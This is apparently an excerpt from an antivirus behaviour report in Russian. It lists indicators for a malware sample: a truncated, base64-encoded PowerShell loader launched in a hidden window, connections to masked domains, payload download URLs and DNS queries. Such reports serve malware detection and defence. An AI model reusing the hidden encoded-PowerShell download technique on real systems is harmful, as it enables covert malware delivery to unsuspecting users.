Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQBXAC0ATwBCAEoAZQBjAFQAIABJAG8ALgBzAFQAcgBFAGEATQBSAEUAQQBEAGUAUgAoACgAIABuAGUAVwAtAE8AQgBKAGUAYwBUACAAcwB5AHMAVABFAG0ALgBJAG8ALgBjAE8AbQBQAHIARQBzAHMAaQBvAG4ALgBEAGUAZgBMAGEAVABFAH...
- 'mi###oyle.com':80
- 'mi###oyle.com':443
- 'kd###ord.com':80
- 'ar###leri.ru':80
- 'st####nmahler.de':80
- http://mi###oyle.com/068W54R1Rk/
- http://kd###ord.com/VJJjAUmAL/
- http://st####nmahler.de/s6SeuV0/
- 'mi###oyle.com':443
- DNS ASK mi###oyle.com
- DNS ASK kd###ord.com
- DNS ASK ar###leri.ru
- DNS ASK to####igorta.com
- DNS ASK st####nmahler.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQBXAC0ATwBCAEoAZQBjAFQAIABJAG8ALgBzAFQAcgBFAGEATQBSAEUAQQBEAGUAUgAoACgAIABuAGUAVwAtAE8AQgBKAGUAYwBUACAAcwB5AHMAVABFAG0ALgBJAG8ALgBjAE8AbQBQAHIARQBzAHMAaQBvAG4ALgBEAGUAZgBMAGEAVABFAH...' (со скрытым окном)